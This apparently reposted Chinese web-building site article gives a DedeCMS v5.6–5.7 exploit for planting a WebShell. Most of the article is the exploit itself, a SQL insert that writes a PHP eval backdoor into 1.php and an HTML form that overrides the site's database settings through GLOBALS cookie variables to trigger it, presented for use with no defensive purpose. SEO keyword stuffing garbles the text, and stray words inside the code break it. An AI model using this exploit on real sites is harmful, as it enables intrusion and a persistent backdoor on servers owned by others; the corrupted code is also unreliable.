导读:织梦技术织梦技术昨天自己的一个网站中毒了,花了N天时间没有找出来,前天没事搜索了一下dedecms漏洞,结果发现V5.6/V5.7漏洞一堆一堆的,下面我收集了现在Dedecmsdede免费校板下战织梦模板免费。
DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)
前题条件,必须准备好自己的dede,然后插入数据:
以下是引用片段:
代码如下 |
|
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @("1.php"织梦模板, 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');
|
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
以下是引用片段:
代码如下 |
|
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
关键词标签: 织梦 标签 漏洞
声明: 本文由我的SEOUC技术文章主页发布于:2023-07-19 ,文章Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术主要讲述漏洞,标签,织梦网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: http://www.tngdez.cn/article/web_30981.html
为你推荐与Dedecms V5.6/V5.7漏洞问题收集总结,织梦技术相关的文章
网站建设技术SEOUC.COM
专注网站建设,SEO优化,小程序设计制作搭建开发定制网站等,数千家网站定制开发案例,网站推广技术服务。
5000+合作客服
8年从业经验
150+覆盖行业
|